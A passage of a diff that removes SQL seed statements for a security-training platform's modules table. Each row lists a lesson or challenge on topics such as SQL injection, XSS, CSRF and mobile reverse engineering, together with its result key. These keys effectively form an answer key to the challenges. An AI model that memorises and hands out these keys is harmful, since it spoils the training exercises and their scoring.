- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('201ae6f8c55ba3f3b5881806387fbf34b15c30c2', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage',
- 'lesson', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage',
- 'base64isNotEncryptionBase64isEncodingBase64HidesNothingFromYou',
- 'if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2', 'open', '46', '25', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('408610f220b4f71f7261207a17055acbffb8a747', 'SQL Injection', 'sql.injection', 'lesson', 'Injection',
- 'injection', '3c17f6bf34080979e0cebda5672e989c07ceec9fa4ee7b7c17c9e3ce26bc63e0',
- 'e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594', 'open', '55', '30', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('891a0208a95f1791287be721a4b851d4c584880a', 'Insecure Cryptographic Storage Challenge 1',
- 'insecure.cryptographic.storage.challenge.1', 'challenge', 'Insecure Cryptographic Storage',
- 'insecure.cryptographic.storage', 'mylovelyhorserunningthroughthefieldwhereareyougoingwithyourbiga',
- 'x9c408d23e75ec92495e0caf9a544edb2ee8f624249f3e920663edb733f15cd7', 'open', '65', '35', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4', 'Insecure Direct Object Reference Challenge 1',
- 'insecure.direct.object.reference.challenge.1', 'challenge', 'Insecure Direct Object References',
- 'insecure.direct.object.references', 'dd6301b38b5ad9c54b85d07c087aebec89df8b8c769d4da084a55663e6186742',
- 'o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c', 'open', '66', '35', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('6be5de81223cc1b38b6e427cc44f8b6a28d2bc96', 'Poor Data Validation 1', 'poor.data.validation.1', 'challenge',
- 'Poor Data Validation', 'poor.data.validation',
- 'd30475881612685092e5ec469317dcc5ccc1f548a97bfdb041236b5bba7627bf',
- 'ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e', 'open', '67', '35', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('544aa22d3dd16a8232b093848a6523b0712b23da', 'SQL Injection 1', 'sql.injection.1', 'challenge', 'Injection',
- 'injection', 'fd8e9a29dab791197115b58061b215594211e72c1680f1eacc50b0394133a09f',
- 'e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a', 'open', '68', '35', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('2ab09c0c18470ae5f87d219d019a1f603e66f944', 'Reverse Engineering', 'reverse.engineering', 'lesson',
- 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'DrumaDrumaDrumBoomBoom',
- '19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9', 'open', '75', '40', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d', 'Session Management Challenge 1', 'session.management.challenge.1',
- 'challenge', 'Session Management', 'session.management', 'db7b1da5d7a43c7100a6f01bb0c',
- 'dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a', 'open', '75', '40', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('3d5b46abc6865ba09aaff98a8278a5f5e339abff', 'Failure to Restrict URL Access 1',
- 'failure.to.restrict.url.access.1', 'challenge', 'Failure to Restrict URL Access',
- 'failure.to.restrict.url.access', 'c776572b6a9d5b5c6e4aa672a4771213',
- '4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99', 'open', '76', '40', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('1506f22cd73d14d8a73e0ee32006f35d4f234799', 'Unintended Data Leakage', 'unintended.data.leakage', 'lesson',
- 'Mobile Data Leakage', 'mobile.data.leakage', 'SilentButSteadyRedLed',
- '392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec', 'open', '77', '40', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('453d22238401e0bf6f1ff5d45996407e98e45b07', 'Cross Site Request Forgery', 'cross.site.request.forgery',
- 'lesson', 'CSRF', 'csrf', '666980771c29857b8a84c686751ce7edaae3d6ac1',
- 'ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7', 'open', '78', '40', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('5b461ebe2e5e2797740cb3e9c7e3f93449a93e3a', 'Content Provider Leakage', 'content.provider.leakage', 'lesson',
- 'Mobile Content Provider', 'mobile.content.provider', 'LazerLizardsFlamingWizards',
- '4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39', 'open', '79', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('6f5db377c28da4179bca1a43ede8d6bcf7bd322e', 'Untrusted Input', 'untrusted.input', 'lesson',
- 'Mobile Security Decisions via Untrusted Input', 'mobile.security.decisions.via.untrusted.input',
- 'RetroMagicFuturePunch', '5e2b61c679d1f290d23308b3b66c3ec00cd069f1483b705d17f2795a4e77dcb6', 'open', '82', '50',
- 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('52885a3db5b09adc24f38bc453fe348f850649b3', 'Reverse Engineering 1', 'reverse.engineering.1', 'challenge',
- 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'christopherjenkins',
- '072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295', 'open', '85', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('b6432a6b5022cb044e9946315c44ab262ab59e88', 'Unvalidated Redirects and Forwards',
- 'unvalidated.redirects.and.forwards', 'lesson', 'Unvalidated Redirects and Forwards',
- 'unvalidated.redirects.and.forwards', '658c43abcf81a61ca5234cfd7a2',
- 'f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f', 'open', '86', '45', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('335440fef02d19259254ed88293b62f31cccdd41', 'Client Side Injection', 'client.side.injection', 'lesson',
- 'Mobile Injection', 'mobile.injection', 'VolcanicEruptionsAbruptInterruptions',
- 'f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1', 'open', '87', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('f771a10efb42a79a9dba262fd2be2e44bf40b66d', 'SQL Injection 2', 'sql.injection.2', 'challenge', 'Injection',
- 'injection', 'f62abebf5658a6a44c5c9babc7865110c62f5ecd9d0a7052db48c4dbee0200e3',
- 'ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b', 'open', '88', '45', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('d7eaeaa1cc4f218abd86d14eefa183a0f8eb6298', 'NoSQL Injection One', 'nosql.injection.one', 'challenge',
- 'Injection', 'injection', 'c09f32d4c3dd5b75f04108e5ffc9226cd8840288a62bdaf9dc65828ab6eaf86a',
- 'd63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66', 'open', '89', '45', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('0cdd1549e7c74084d7059ce748b93ef657b44457', 'Poor Authentication', 'poor.authentication', 'lesson',
- 'Mobile Poor Authentication', 'mobile.poor.authentication', 'UpsideDownPizzaDip',
- '77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e', 'open', '90', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ef6496892b8e48ac2f349cdd7c8ecb889fc982af', 'Broken Crypto', 'broken.crypto', 'lesson', 'Mobile Broken Crypto',
- 'mobile.broken.crypto', '33edeb397d665ed7d1a580f3148d4b2f',
- '911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212', 'open', '97', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('f16bf2ab1c1bf400d36330f91e9ac6045edcd003', 'Reverse Engineering 2', 'reverse.engineering.2', 'challenge',
- 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'FireStoneElectric',
- '5bc811f9e744a71393a277c51bfd8fbb5469a60209b44fa3485c18794df4d5b1', 'open', '98', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('c685f8102ae0128c2ab342df64699bb8209a0839', 'SQL Injection Escaping', 'sql.injection.escaping', 'challenge',
- 'Injection', 'injection', '0dcf9078ba5d878f9e23809ac8f013d1a08fdc8f12c5036f1a4746dbe86c0aac',
- '8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4', 'open', '99', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('b70a84f159876bb9885b6e0087d22f0a52abbfcf', 'Session Management Challenge 2', 'session.management.challenge.2',
- 'challenge', 'Session Management', 'session.management', '4ba31e5ffe29de092fe1950422a',
- 'd779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7', 'open', '105', '55', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('20e755179a5840be5503d42bb3711716235005ea', 'CSRF 1', 'csrf.1', 'challenge', 'CSRF', 'csrf',
- '7639c952a191d569a0c741843b599604c37e33f9f5d8eb07abf0254635320b07',
- 's74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52', 'open', '106', '55', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e', 'Session Management Challenge 3', 'session.management.challenge.3',
- 'challenge', 'Session Management', 'session.management', 'e62008dc47f5eb065229d48963',
- 't193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3', 'open', '115', '60', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('307f78f18fd6a87e50ed6705231a9f24cd582574', 'Insecure Data Storage 1', 'insecure.data.storage.1', 'challenge',
- 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'WarshipsAndWrenches',
- '362f84cf26bf96aeae358d5d0bbee31e9291aaa5367594c29b3af542a7572c01', 'open', '116', '60', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('3f010a976bcbd6a37fba4a10e4a057acc80bdc09', 'Broken Crypto 1', 'broken.crypto.1', 'challenge',
- 'Mobile Broken Crypto', 'mobile.broken.crypto', 'd1f2df53084b970ab538457f5af34c8b',
- 'd2f8519f8264f9479f56165465590b499ceca941ab848805c00f5bf0a40c9717', 'open', '117', '60', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('d4e2c37d8f1298fcaf4edcea7292cb76e9eab09b', 'Cross Site Scripting 2', 'cross.site.scripting.2', 'challenge',
- 'XSS', 'xss', '495ab8cc7fe9532c6a75d378de', 't227357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888',
- 'open', '119', '60', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('9e46e3c8bde42dc16b9131c0547eedbf265e8f16', 'Reverse Engineering 3', 'reverse.engineering.3', 'challenge',
- 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'C1babd72225f0e9934YZ8',
- 'dbae0baa3f71f196c4d2c6c984d45a6c1c635bf1b482dccfe32e9b01b69a042b', 'open', '120', '76', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('0709410108f91314fb6f7721df9b891351eb2fcc', 'Insecure Cryptographic Storage Challenge 2',
- 'insecure.cryptographic.storage.challenge.2', 'challenge', 'Insecure Cryptographic Storage',
- 'insecure.cryptographic.storage', 'TheVigenereCipherIsAmethodOfEncryptingAlphabeticTextByUsingPoly',
- 'h8aa0fdc145fb8089661997214cc0e685e5f86a87f30c2ca641e1dde15b01177', 'open', '126', '65', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('82e8e9e2941a06852b90c97087309b067aeb2c4c', 'Insecure Direct Object Reference Challenge 2',
- 'insecure.direct.object.reference.challenge.2', 'challenge', 'Insecure Direct Object References',
- 'insecure.direct.object.references', '1f746b87a4e3628b90b1927de23f6077abdbbb64586d3ac9485625da21921a0f',
- 'vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4', 'open', '127', '65', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342', 'Cross Site Scripting 3', 'cross.site.scripting.3', 'challenge',
- 'XSS', 'xss', '6abaf491c9122db375533c04df', 'ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e',
- 'open', '128', '65', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('da3de2e556494a9c2fb7308a98454cf55f3a4911', 'Insecure Data Storage 2', 'insecure.data.storage.2', 'challenge',
- 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'starfish123',
- 'ec09515a304d2de1f552e961ab769967bdc75740ad2363803168b7907c794cd4', 'open', '129', '65', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('cb7d696bdf88899e8077063d911fc8da14176702', 'Insecure Data Storage 3', 'insecure.data.storage.3', 'challenge',
- 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'c4ptainBrunch',
- '11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851', 'open', '130', '60', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('de626470273c01388629e5a56ac6f17e2eef957b', 'Insecure Direct Object Reference Bank',
- 'insecure.direct.object.reference.bank', 'challenge', 'Insecure Direct Object References',
- 'insecure.direct.object.references', '4a1df02af317270f844b56edc0c29a09f3dd39faad3e2a23393606769b2dfa35',
- '1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c', 'open', '131', '60', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('f40b0cd5d45327c9426675313f581cf70c7c7c28', 'Unintended Data Leakage 1', 'unintended.data.leakage.1',
- 'challenge', 'Mobile Data Leakage', 'mobile.data.leakage', 'BagsofSalsa',
- '517622a535ff89f7d90674862740b48f53aad7b41390fe46c6f324fee748d136', 'open', '132', '60', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e', 'SQL Injection 3', 'sql.injection.3', 'challenge', 'Injection',
- 'injection', '9815 1547 3214 7569', 'b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6', 'open',
- '135', '70', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('94cd2de560d89ef59fc450ecc647ff4d4a55c15d', 'CSRF 2', 'csrf.2', 'challenge', 'CSRF', 'csrf',
- '45309dbaf8eaf6d1a5f1ecb1bf1b6be368a6542d3da35b9bf0224b88408dc001',
- 'z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e', 'open', '136', '70', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('5ca9115f3279b9b9f3308eb6a59a4fcd374846d6', 'CSRF 3', 'csrf.3', 'challenge', 'CSRF', 'csrf',
- '6bdbe1901cbe2e2749f347efb9ec2be820cc9396db236970e384604d2d55b62a',
- 'z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c', 'open', '137', '70', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('a3f7ffd0f9c3d15564428d4df0b91bd927e4e5e4', 'Client Side Injection 1', 'client.side.injection.1', 'challenge',
- 'Mobile Injection', 'mobile.injection', 'SourHatsAndAngryCats',
- '8855c8bb9df4446a546414562eda550520e29f7a82400a317c579eb3a5a0a8ef', 'open', '138', '70', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('cfbf7b915ee56508ad46ab79878f37fd9afe0d27', 'CSRF 4', 'csrf.4', 'challenge', 'CSRF', 'csrf',
- 'bb78f73c7efefec25e518c3a91d50d789b689c4515b453b6140a2e4e1823d203',
- '84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5', 'open', '139', '70', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('1e3c02ad49fa9a9e396a3b268d7da8f0b647d8f9', 'Unintended Data Leakage 2', 'unintended.data.leakage.2',
- 'challenge', 'Mobile Data Leakage', 'mobile.data.leakage', '627884736748',
- '85ceae7ec397c8f4448be51c33a634194bf5da440282227c15954bbdfb54f0c7', 'open', '140', '70', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('fcc1918e0a23b8420e173cf8029876cb887408d3', 'CSRF JSON', 'csrf.json', 'challenge', 'CSRF', 'csrf',
- 'f57f1377bd847a370d42e1410bfe48c9a3484e78d50e83f851b634fe77d41a6e',
- '2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb', 'open', '141', '70', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ced925f8357a17cfe3225c6236df0f681b2447c4', 'Session Management Challenge 4', 'session.management.challenge.4',
- 'challenge', 'Session Management', 'session.management', '238a43b12dde07f39d14599a780ae90f87a23e',
- 'ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6', 'open', '145', '75', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('182f519ef2add981c77a584380f41875edc65a56', 'Cross Site Scripting 4', 'cross.site.scripting.4', 'challenge',
- 'XSS', 'xss', '515e05137e023dd7828adc03f639c8b13752fbdffab2353ccec',
- '06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751', 'open', '146', '75', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998', 'SQL Injection 4', 'sql.injection.4', 'challenge', 'Injection',
- 'injection', 'd316e80045d50bdf8ed49d48f130b4acf4a878c82faef34daff8eb1b98763b6f',
- '1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629', 'open', '147', '75', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('b3cfd5890649e6815a1c7107cc41d17c82826cfa', 'Insecure Cryptographic Storage Challenge 3',
- 'insecure.cryptographic.storage.challenge.3', 'challenge', 'Insecure Cryptographic Storage',
- 'insecure.cryptographic.storage', 'THISISTHESECURITYSHEPHERDABCENCRYPTIONKEY',
- '2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1', 'open', '148', '75', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('63bc4811a2e72a7c833962e5d47a41251cd90de3', 'Broken Crypto 2', 'broken.crypto.2', 'challenge',
